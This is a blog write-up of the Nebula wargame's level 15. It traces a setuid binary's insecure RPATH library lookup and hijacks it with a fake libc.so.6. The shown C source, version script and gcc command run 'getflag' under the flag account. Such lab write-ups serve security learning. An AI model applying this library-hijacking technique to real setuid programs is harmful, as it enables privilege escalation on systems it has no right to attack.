"Whatever Pages"
Blog About RSS

Insecure Library Loading

Jul 6, 2015 • Category: Wargame, nebula

         Nebula 15 Agenda: “strace the binary at “/home/flag15/flag15” and see if you spot anything out of the ordinary.”


Starting from tracing:

1 ...
2 open("/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
3 stat64("/var/tmp/flag15/tls/i686/sse2/cmov", 0xbf88db44) = -1 ENOENT (No such file or directory)
4 ...
5 open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
6 stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=3, ...}) = 0
7 open("/etc/ld.so.cache", O_RDONLY)      = 3
8 ...

and what we can see is that the program tries to find and load “libc.so.6” via predefined set which was binded through the rpath linker(ld) option. However, at the end it’s succeeds with the cache (which in order contains the proper libc path). Hence, as we already know all lookup-cells we could try to hijack library with one.

As follows, starting with simple source with single “__attribute((constructor))“(as testing initialization routine), after a facing with couple of relocation errors:

1 symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
2 ...
3 symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
4 ...
5 no version information available (required by /home/flag15/flag15)

Reached the next outcome:

 1 /* fake_lib.c */
 2 #include <stdlib.h>
 3 #include <stdio.h>
 4 
 5 void __cxa_finalize(void * d) {return;}
 6 
 7 int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
 8 
 9  printf("----------------------------------------------------------\n");
10  system("getflag");
11  printf("----------------------------------------------------------\n");
12 
13  exit(0);
14 }

To eliminate error with absent version information was used a version script(allows to explicitly control the symbols exported by a library):

1 echo "GLIBC_2.0 {};" > fakelib.map

Copiled with static “libC” linking:

1 gcc -shared -static-libgcc -fPIC -Wl,--version-script=fakelib.map,-Bstatic -o libc.so.6 fake_lib.c

and final cut… drum-roll, the climax - boom:

1 level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
2 ----------------------------------------------------------
3 You have successfully executed getflag on a target account
4 ----------------------------------------------------------

Resources:

Avatar

Assembled by Nobody

Surprise motherf*cker!